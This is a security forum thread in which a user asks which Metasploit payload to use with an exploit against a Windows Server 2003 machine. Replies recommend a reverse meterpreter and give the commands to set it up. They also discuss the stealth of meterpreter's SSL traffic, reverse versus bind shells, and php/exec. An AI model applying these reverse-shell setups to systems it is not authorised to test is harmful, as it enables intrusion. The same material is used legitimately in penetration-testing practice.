a question about metasploit

    • #7027
      midnight monster

      Hello there!
      I have a problem with Metasploit: I don't know which of the payloads is best for my exploit (I know the server vulnerability and I am sure about my exploit), and when I use the “show payloads” command I see a lot of compatible payloads. Please help me find the best payload.

    • #43613

      The “best” payload to use will depend on your scenario.


    • #43614

      Try each one and see which works best for you! That’s part of the fun of Metasploit. For each one that doesn’t work try to find out why!


    • #43615

      As previously mentioned we don’t know your environment, or your target for that matter.

      If it’s within a local lab environment, targeting a Windows system, give the reverse meterpreter a try…

      set payload windows/meterpreter/reverse_tcp
      set lhost
      set lport 8888

    • #43616
      midnight monster

      Oh Steve, are you kidding!! It has a hundred compatible payloads and it takes a lot of time for me.

    • #43617

      @midnight monster wrote:

      Oh Steve, are you kidding!! It has a hundred compatible payloads and it takes a lot of time for me.

      OK. What is the server OS and vulnerability? If it’s Windows then Meterpreter (as mentioned by BILLV) is always a favorite of mine.


    • #43618

      On Windows, a meterpreter is always better because all Windows post modules support it (plus tons of features). It also communicates in SSL, so that adds a bit more stealth. On Linux though, it’s a different story; honestly you’re probably better off with a non-meterpreter shell, because the Linux meterpreter isn’t as good as the Windows one.

      reverse vs bind… come to think about it, I almost never use bind these days on a machine behind a firewall.  But people do use bind shells.

      By the way, when you select an exploit, and do “show payloads” — that will only show all the payloads compatible with that particular exploit.  If you’re testing a web app exploit, keep in mind php/exec might not return an output (even though the command ran successfully).

      If you’re still clueless about which payload to use, just use a reverse meterpreter like everybody else has been recommending.

      Lastly, perhaps you should consider asking Metasploit questions on #metasploit in freenode, so the actual metasploit dev team can answer your questions more quickly.

      And yes… I did sign up for an account here just to answer your question.

    • #43619
      midnight monster

      Thank you msfsinn3r, your info was very useful for me.
      My server is Windows Server 2003,
      and thanks a lot.

    • #43620

      btw you can use the search command to get selected exploits, like “search smb”. Try it and lemme know 🙂
